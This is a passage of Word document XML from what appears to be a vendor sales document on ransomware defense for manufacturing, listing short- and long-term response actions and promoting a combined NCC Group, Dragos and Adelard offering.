          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and sector ISAC </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref92">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[92]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000338">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h1pyu231txcm" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term Actions (4-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000339">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assess safety system integrity</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before restart </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref93">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33A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate all firmware</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> hasn't been modified </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref94">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[94]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Review supplier portal access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> logs </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref95">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[95]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement emergency procurement</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref96">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[96]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a08x41y1ia7x" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term Actions (1-30 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Segment IT/OT networks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with unidirectional gateways </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref97">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[97]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement privileged access management</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for OT </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref98">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[98]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000340">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy OT-specific EDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> solutions </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref99">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[99]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000341">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish isolated backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> infrastructure </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref100">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[100]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_97msnll4qbjy" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tri-Partner Solution Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000345">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ifxpzhsjfbpn" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrated Response Capability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000346">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The combination of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard AESOP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides unmatched defense against sophisticated ransomware campaigns targeting manufacturing </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref101">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[101]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000347">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_amidud45il20" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NCC Group OTCE Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manufacturing Security Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Industry 4.0 security evaluation </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref102">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349">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Specialized manufacturing IR with production recovery focus </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref103">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[103]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OT Network Architecture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Proper IT/OT segmentation design </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref104">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[104]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_45srgr4wosjc" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dragos Platform Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RansomHub Detection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Purpose-built analytics for ransomware precursors </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref105">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[105]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crown Jewel Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Identify and protect critical production assets </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref106">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[106]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Hunting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Proactive searches for affiliate infrastructure </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref107">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[107]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000034F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_veo37uukkruy" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security Integration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000350">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Impact Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensure ransomware doesn't create unsafe conditions </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref108">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[108]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000351">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL Maintenance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Verify safety functions remain effective during cyber events </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref109">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[109]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000352">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery Validation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Safe restart procedures post-ransomware </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref110">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[110]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000353">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h6g1xjqra9h7" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Competitive Advantage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000354">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike traditional cybersecurity vendors, our tri-partner solution offers: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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
